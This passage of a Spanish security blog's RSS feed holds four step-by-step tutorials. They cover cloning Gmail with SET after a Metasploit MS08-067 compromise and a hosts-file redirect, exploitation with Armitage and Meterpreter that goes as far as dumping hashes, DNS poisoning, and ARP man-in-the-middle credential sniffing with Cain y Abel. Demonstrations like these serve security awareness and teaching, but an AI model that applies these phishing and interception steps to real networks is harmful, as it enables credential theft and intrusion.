		<description><![CDATA[Hola! Muy buenas a todos/as! El navegar de manera segura y, no introducir tus credenciales en redes públicas no es algo novedoso. Hoy mostraré como es de sencillo el poder clonar una página web y capturar las credenciales de la víctima. Para este ataque lo haremos en dos partes, la primera parte consistirá en conseguir [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3851&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>El navegar de manera segura y, no introducir tus credenciales en redes públicas no es algo novedoso.</p>
<p>Hoy mostraré como es de sencillo el poder clonar una página web y capturar las credenciales de la víctima.</p>
<p>Para este ataque lo haremos en dos partes, la primera parte consistirá en conseguir acceso de administrador a la máquina de manera que podremos modificar l archivo hosts para redireccionar las peticiones.</p>
<p>Para conseguir acceso administrador usamos el exploit de Metasploit ms08_067_netapi</p>
<p>Como no es nuevo aqui adjunto una imagen de como se hace paso por paso</p>
<p><img class="aligncenter" src="http://img820.imageshack.us/img820/9127/revertcp.png" alt="" width="933" height="617" /></p>
<p>Ya tenemos acceso a la máquina remota como administrador, modificamos el archivo de hosts y le decimos que</p>
<p>192.168.37.132 gmail.com</p>
<p>Es decir que cuando la víctima acceda a gmail.com será redireccionado a nuestro PC para robarle las credenciales.</p>
<p>Una vez, este listo lo del archivo hosts ponemos a trabajar a SET</p>
<p><img class="aligncenter" src="http://img163.imageshack.us/img163/4366/setbw.png" alt="" width="555" height="830" /></p>
<p>Tenemos diferentes ataques disponibles escogemos Website attack Vector</p>
<p><img class="aligncenter" src="http://img535.imageshack.us/img535/6894/set2y.png" alt="" width="626" height="772" /></p>
<p>Ahora elegimos el ataque 3 Credential Harvester attack method</p>
<p><img class="aligncenter" src="http://img824.imageshack.us/img824/1219/set3v.png" alt="" width="592" height="657" /></p>
<p>Set viene predefinido con templates para poder usar, así que nos basaremos en un template</p>
<p><img class="aligncenter" src="http://img850.imageshack.us/img850/3103/set4i.png" alt="" width="731" height="254" /></p>
<p>Lo que haremos será clonar Gmail</p>
<p><img class="aligncenter" src="http://img96.imageshack.us/img96/6282/set5.png" alt="" width="624" height="162" /></p>
<p>Nos da una descripción del ataque</p>
<p><img class="aligncenter" src="http://img814.imageshack.us/img814/211/set6.png" alt="" width="608" height="95" /></p>
<p>Nos avisa de que ha lanzado el servicio en el puerto 80</p>
<p><img class="aligncenter" src="http://img96.imageshack.us/img96/3475/set8d.png" alt="" width="576" height="53" /></p>
<p>Cuando el cliente se conecte nos llegará un aviso</p>
<p>Para el usuario la web &#8220;parece normal&#8221;</p>
<p><img class="aligncenter" src="http://img225.imageshack.us/img225/2118/set7.png" alt="" width="797" height="599" /></p>
<p>Cuando el usuario introduzca las credenciales serán robadas</p>
<p><img class="aligncenter" src="http://img217.imageshack.us/img217/9986/set9.png" alt="" width="797" height="384" /></p>
<p>Ya tenemos los datos de la cuenta.</p>
<p>Asi que recuerda, navega solo por sitios seguros <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/set/'>SET</a>, <a href='http://seifreed.com/tag/social-engineering-toolkit/'>social engineering toolkit</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3851/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3851/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3851/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3851&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/07/22/set-social-engineering-toolkit/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img820.imageshack.us/img820/9127/revertcp.png" medium="image" />

		<media:content url="http://img163.imageshack.us/img163/4366/setbw.png" medium="image" />

		<media:content url="http://img535.imageshack.us/img535/6894/set2y.png" medium="image" />

		<media:content url="http://img824.imageshack.us/img824/1219/set3v.png" medium="image" />

		<media:content url="http://img850.imageshack.us/img850/3103/set4i.png" medium="image" />

		<media:content url="http://img96.imageshack.us/img96/6282/set5.png" medium="image" />

		<media:content url="http://img814.imageshack.us/img814/211/set6.png" medium="image" />

		<media:content url="http://img96.imageshack.us/img96/3475/set8d.png" medium="image" />

		<media:content url="http://img225.imageshack.us/img225/2118/set7.png" medium="image" />

		<media:content url="http://img217.imageshack.us/img217/9986/set9.png" medium="image" />
	</item>
		<item>
		<title>Armitage GUI front-end de Metasploit</title>
		<link>http://seifreed.com/2011/06/24/armitage-gui-front-end-de-metasploit/</link>
		<comments>http://seifreed.com/2011/06/24/armitage-gui-front-end-de-metasploit/#comments</comments>
		<pubDate>Fri, 24 Jun 2011 13:49:43 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Servicios]]></category>
		<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Armitage]]></category>
		<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[Meterpreter]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3828</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Quien se dedica a la seguridad conoce sin duda metasploit. Metasploit puede ser complicado de usar si no conocemos bien como funciona. Existen GUI gráficas como Armitage. Armitage trabaja como front-end de Metasploit. En Backtrack está en los repositorios así que lo instalamos con: root@bt: apt-get install armitage Con esto [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3828&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Quien se dedica a la seguridad conoce sin duda metasploit. Metasploit puede ser complicado de usar si no conocemos bien como funciona. Existen GUI gráficas como <a href="http://fastandeasyhacking.com/">Armitage.</a></p>
<p>Armitage trabaja como front-end de Metasploit.</p>
<p>En Backtrack está en los repositorios así que lo instalamos con:</p>
<blockquote><p>root@bt: apt-get install armitage</p></blockquote>
<p>Con esto tendremos Armitage instalado en nuestro sistema.</p>
<p>Igual que hacíamos <a href="http://seifreed.com/2011/02/24/fasttrack-automatizando-ataques/">con autopown usando Fasttrack</a> necesitamos usar MYSQL, así que iniciamos MYSQL:</p>
<blockquote><p>root@bt: /etc/init.d/mysql start</p></blockquote>
<p>Ahora nos conectaremos a la base de datos para poder usar Armitage, como lo haremos por defecto lo haremos así:</p>
<blockquote><p>root@bt:~# msfrpcd -f -U msf -P test -t Basic<br />
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic&#8230;<br />
[*] XMLRPC ready at Thu Jun 23 20:28:49 +0200 2011.</p></blockquote>
<p>Ahora arrancaremos Armitage:</p>
<blockquote><p>root@bt:/pentest/exploits/armitage# ./armitage.sh</p></blockquote>
<p><img class="aligncenter" src="http://img713.imageshack.us/img713/6053/armitageconnect.png" alt="" width="386" height="318" /></p>
<p>Si no hemos cambiado anda de la instalación de Backtrack por defecto, esto lo dejamos de esta manera.</p>
<p><img class="aligncenter" src="http://img26.imageshack.us/img26/1/driveru.png" alt="" width="300" height="139" /></p>
<p>Armitage nos avisa que usará el driver mysql.</p>
<p><img class="aligncenter" src="http://img28.imageshack.us/img28/1572/armitage.png" alt="" width="799" height="566" /></p>
<p>Esta es la pantalla principal de Armitage, a la izquierda tenemos una lista de exploits de Metasploit, abajo tenemosla consola de Metasploit.</p>
<p>Ahora lo que haremos es encontrar los equipos para el lanzamiento de los exploits.</p>
<p><img class="aligncenter" src="http://img24.imageshack.us/img24/8222/nmap.png" alt="" width="798" height="293" /></p>
<p>Con NAMP lo que haremos es lo que hacemos normalmente, que es buscar puertos abiertos, versión del sistema operativo etc..</p>
<p><img class="aligncenter" src="http://img194.imageshack.us/img194/6189/rango.png" alt="" width="804" height="366" /></p>
<p>Introducimos el rango de IP&#8217;s que queremos escanear o bien la dirección IP del host directamente si la conocemos.</p>
<p><img class="aligncenter" src="http://img195.imageshack.us/img195/1560/ataquesh.png" alt="" width="338" height="168" /></p>
<p>Como ya tenemos el scan echo podemos encontrar ataques con las vulnerabilidades que encontremos.</p>
<p><img class="aligncenter" src="http://img30.imageshack.us/img30/1369/equiposscan.png" alt="" width="442" height="572" /></p>
<p>Podemos ver que se ha indetificado como un equipo Windows XP</p>
<p><img class="aligncenter" src="http://img7.imageshack.us/img7/6297/serviciosi.png" alt="" width="163" height="103" /></p>
<p>Si clicamos en encima del Host podemos ver Services y Host, si le damos a services podemos ver lo servicios que ha identificado</p>
<p><img class="aligncenter" src="http://img708.imageshack.us/img708/2207/servicios2.png" alt="" width="798" height="75" /></p>
<p>Ya tenemos los servicios</p>
<p><img class="aligncenter" src="http://img708.imageshack.us/img708/3346/findattacks.png" alt="" width="491" height="203" /></p>
<p>Ahora podemos buscar exploits de Metasploit basandose en los puertos y servicios que ha encontrado.</p>
<p><img class="aligncenter" src="http://img585.imageshack.us/img585/3456/attacks.png" alt="" width="398" height="230" /></p>
<p>Ahora  ya ha encontrado los ataques que podemos hacerle.</p>
<p><img class="aligncenter" src="http://img51.imageshack.us/img51/4552/ataques2.png" alt="" width="287" height="108" /></p>
<p>Tenemos un menú para poder lanzar el ataque que queramos.</p>
<p><img class="aligncenter" src="http://img706.imageshack.us/img706/7860/ataques3.png" alt="" width="589" height="361" /></p>
<p>Podemos especificar opciones avanzadas en el ataque.</p>
<p>Cuando la máquina es comprometida sale así</p>
<p><img class="aligncenter" src="http://img34.imageshack.us/img34/9351/pccomprometido.png" alt="" width="205" height="118" /></p>
<p>Ya está el equipo comprometido.</p>
<p><img class="aligncenter" src="http://img38.imageshack.us/img38/696/pccomprometido2.png" alt="" width="782" height="230" /></p>
<p>En la consola de Metasploit podemos ver que ha conseguido una sesion de Meterpreter</p>
<p><img class="aligncenter" src="http://img837.imageshack.us/img837/5722/pccomprometido3.png" alt="" width="357" height="215" /></p>
<p>De manera gráfica también tenemos las opciones disponibles con Meterpreter</p>
<p><img class="aligncenter" src="http://img713.imageshack.us/img713/579/browsee.png" alt="" width="795" height="260" /></p>
<p>Podemos navegar de manera perfecta por todo el sistema operativo</p>
<p><img class="aligncenter" src="http://img231.imageshack.us/img231/636/hashes.png" alt="" width="662" height="143" /></p>
<p>Y podemos sacar los Hashes de los usuarios</p>
<p><img class="aligncenter" src="http://img15.imageshack.us/img15/9035/commandshell.png" alt="" width="541" height="289" /></p>
<p>Y podemos obtener una consola CMD de Windows.</p>
<p>&nbsp;</p>
<p>Y hasta aquí una sesión de Meterpreter.</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/sistemas-operativos/linux/'>Linux</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/servicios/'>Servicios</a>, <a href='http://seifreed.com/category/sistemas-operativos/'>Sistemas Operativos</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/armitage/'>Armitage</a>, <a href='http://seifreed.com/tag/backtrack/'>Backtrack</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/metasploit/'>metasploit</a>, <a href='http://seifreed.com/tag/meterpreter/'>Meterpreter</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3828/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3828/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3828/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3828&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/06/24/armitage-gui-front-end-de-metasploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img713.imageshack.us/img713/6053/armitageconnect.png" medium="image" />

		<media:content url="http://img26.imageshack.us/img26/1/driveru.png" medium="image" />

		<media:content url="http://img28.imageshack.us/img28/1572/armitage.png" medium="image" />

		<media:content url="http://img24.imageshack.us/img24/8222/nmap.png" medium="image" />

		<media:content url="http://img194.imageshack.us/img194/6189/rango.png" medium="image" />

		<media:content url="http://img195.imageshack.us/img195/1560/ataquesh.png" medium="image" />

		<media:content url="http://img30.imageshack.us/img30/1369/equiposscan.png" medium="image" />

		<media:content url="http://img7.imageshack.us/img7/6297/serviciosi.png" medium="image" />

		<media:content url="http://img708.imageshack.us/img708/2207/servicios2.png" medium="image" />

		<media:content url="http://img708.imageshack.us/img708/3346/findattacks.png" medium="image" />

		<media:content url="http://img585.imageshack.us/img585/3456/attacks.png" medium="image" />

		<media:content url="http://img51.imageshack.us/img51/4552/ataques2.png" medium="image" />

		<media:content url="http://img706.imageshack.us/img706/7860/ataques3.png" medium="image" />

		<media:content url="http://img34.imageshack.us/img34/9351/pccomprometido.png" medium="image" />

		<media:content url="http://img38.imageshack.us/img38/696/pccomprometido2.png" medium="image" />

		<media:content url="http://img837.imageshack.us/img837/5722/pccomprometido3.png" medium="image" />

		<media:content url="http://img713.imageshack.us/img713/579/browsee.png" medium="image" />

		<media:content url="http://img231.imageshack.us/img231/636/hashes.png" medium="image" />

		<media:content url="http://img15.imageshack.us/img15/9035/commandshell.png" medium="image" />
	</item>
		<item>
		<title>DNS poisoning con Cain y Abel</title>
		<link>http://seifreed.com/2011/06/07/dns-poisoning-con-cain-y-abel/</link>
		<comments>http://seifreed.com/2011/06/07/dns-poisoning-con-cain-y-abel/#comments</comments>
		<pubDate>Tue, 07 Jun 2011 20:40:48 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[DNS]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[cain y abel]]></category>
		<category><![CDATA[DNS poisoning]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3231</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Ayer podíamos ver como hacíamos un ataque man in the middle con Cain y Abel, hoy lo que haremos será envenenar la cache DNS, así que las consultas que haga la víctima, por ejemplo a http://dragonjar.org haremos que sea redirigido a http://seifreed.com. Con esto conseguimos por ejemplo suplantar una página [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3231&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Ayer podíamos ver como hacíamos <a href="http://seifreed.com/2011/06/07/man-in-the-middle-con-cain-y-abel/">un ataque man in the middle con Cain y Abel</a>, hoy lo que haremos será envenenar la cache DNS, así que las consultas que haga la víctima, por ejemplo a http://dragonjar.org haremos que sea redirigido a http://seifreed.com.</p>
<p>Con esto conseguimos por ejemplo suplantar una página sin que el usuario se de cuenta, o por ejemplo redirigir hacía una página de exploits.</p>
<p>Ya tenemos el man in the middle corriendo, ahora nos vamos a APR &#8211; DNS</p>
<p><img class="aligncenter" src="http://img651.imageshack.us/img651/2752/cainyabel.png" alt="" width="489" height="384" /></p>
<p>Añadimos la URL que queremos suplantar</p>
<p><img class="aligncenter" src="http://img148.imageshack.us/img148/1497/cainyabel2.png" alt="" width="563" height="560" /></p>
<p>Hemos añadido que cada vez que el usuario vaya a http://dragonjar.org, resolveremos por el host que queramos,</p>
<p><img class="aligncenter" src="http://img807.imageshack.us/img807/2118/cainyabel4.png" alt="" width="501" height="558" /></p>
<p>Después de poner el dominio que nos interesaba, lo resolvemos para sacar la IP.</p>
<p><img class="aligncenter" src="http://img716.imageshack.us/img716/8485/cainyabel5.png" alt="" width="602" height="558" /></p>
<p>&nbsp;</p>
<p>Podemos ver todo el tráfico que se va generando.</p>
<p>Los ataques de DNS poisoning, son muy peligrosos.</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/networking/dns/'>DNS</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/cain-y-abel/'>cain y abel</a>, <a href='http://seifreed.com/tag/dns-poisoning/'>DNS poisoning</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3231/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3231/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3231/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3231&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/06/07/dns-poisoning-con-cain-y-abel/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img651.imageshack.us/img651/2752/cainyabel.png" medium="image" />

		<media:content url="http://img148.imageshack.us/img148/1497/cainyabel2.png" medium="image" />

		<media:content url="http://img807.imageshack.us/img807/2118/cainyabel4.png" medium="image" />

		<media:content url="http://img716.imageshack.us/img716/8485/cainyabel5.png" medium="image" />
	</item>
		<item>
		<title>Man in the middle con Cain y Abel</title>
		<link>http://seifreed.com/2011/06/07/man-in-the-middle-con-cain-y-abel/</link>
		<comments>http://seifreed.com/2011/06/07/man-in-the-middle-con-cain-y-abel/#comments</comments>
		<pubDate>Mon, 06 Jun 2011 23:09:25 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Conferencia]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[cain y abel]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[man in the middle]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3227</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! El ataque del &#8220;hombre en el medio&#8221; es algo, que no es nuevo ni mucho menos. He creado un escenario súper sencillo en una red local. El escenario es el siguiente. Tenemos el pc de usuario en una parte de la red LOCAL y luego el atacante, con el símbolo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3227&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>El ataque del &#8220;hombre en el medio&#8221; es algo, que no es nuevo ni mucho menos.</p>
<p>He creado un escenario súper sencillo en una red local.</p>
<p>El escenario es el siguiente.</p>
<p><img class="aligncenter" src="http://img90.imageshack.us/img90/2016/redik.png" alt="" width="703" height="349" /></p>
<p>Tenemos el pc de usuario en una parte de la red LOCAL y luego el atacante, con el símbolo del DragoN.</p>
<p>El atcante tiene Windows 7 y el usuario Windows XP.</p>
<p><img class="aligncenter" src="http://img695.imageshack.us/img695/2752/cainyabel.png" alt="" width="609" height="563" /></p>
<p>Lo que haremos primero será poner la tarjeta en modo promiscuo, de manera que pondremos la tarjeta a escuchar todos los paquetes en la red.</p>
<p><img class="aligncenter" src="http://img821.imageshack.us/img821/1497/cainyabel2.png" alt="" width="381" height="480" /></p>
<p>Aquí tenemos el rango de la red LOCAL en el cual, nos mantendremos a la escucha.</p>
<p>Ahora detectaremos los equipos en la red, para poder hacer el ataque</p>
<p><img class="aligncenter" src="http://img810.imageshack.us/img810/44/cainyabel3.png" alt="" width="317" height="185" /></p>
<p>Activamos el snifer y el ARP en Cain y Abel</p>
<p><img class="aligncenter" src="http://img824.imageshack.us/img824/2118/cainyabel4.png" alt="" width="494" height="432" /></p>
<p>En la pestaña de Snifer y en Hosts, escaneamos por MAC ADRESS.</p>
<p><img class="aligncenter" src="http://img88.imageshack.us/img88/8485/cainyabel5.png" alt="" width="503" height="557" /></p>
<p>Seleccionamos hacer todos los test para que empiece a descubrir todos los equipos de la red.</p>
<p><img class="aligncenter" src="http://img109.imageshack.us/img109/6136/cainyabel6.png" alt="" width="608" height="560" /></p>
<p>Podemos ver los equipos que va encontrando</p>
<p><img class="aligncenter" src="http://img217.imageshack.us/img217/4206/cainyabel7.png" alt="" width="599" height="563" /></p>
<p>Ahora que ya sabemos las IP de la red local, le damos a la tecla +</p>
<p><img class="aligncenter" src="http://img854.imageshack.us/img854/3333/cainyabel8.png" alt="" width="667" height="563" /></p>
<p>Aquí tenemos las diferentes IP&#8217;s, seleccionamos la Ip de la puerta de enlace.</p>
<p><img class="aligncenter" src="http://img703.imageshack.us/img703/1777/cainyabel9.png" alt="" width="688" height="565" /></p>
<p>Seleccionamos todos los host para hacer el man in the middle, y hacer poisoning</p>
<p><img class="aligncenter" src="http://img850.imageshack.us/img850/1500/cainyabel10.png" alt="" width="690" height="560" /></p>
<p>El ataque man in the middle ya ha empezado.</p>
<p><img class="aligncenter" src="http://img801.imageshack.us/img801/7646/cainyabel11.png" alt="" width="688" height="564" /></p>
<p>El ataque poisoning, ya está haciendo efecto, hasta que veremos lo siguiente</p>
<p><img class="aligncenter" src="http://img88.imageshack.us/img88/1353/cainyabel12.png" alt="" width="704" height="562" /></p>
<p>Podemos ver abajo el aviso de Full-routing, significa que el ataque man in the middle ha tenido éxito.</p>
<p>Y cuando el usuario acceda con algunas credenciales, como HTTP,  FTP,  SMB, quedarán registradas en Cain y Abel</p>
<p><img class="aligncenter" src="http://img805.imageshack.us/img805/2372/cainyabel13.png" alt="" width="702" height="560" /></p>
<p>Y hasta aquí un proceso de ataque de Man in the middle con Cain y Abel</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/personal/conferencia/'>Conferencia</a>, <a href='http://seifreed.com/category/networking/'>Networking</a>, <a href='http://seifreed.com/category/personal/'>Personal</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/cain-y-abel/'>cain y abel</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/man-in-the-middle/'>man in the middle</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3227/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3227/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3227/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3227&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/06/07/man-in-the-middle-con-cain-y-abel/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

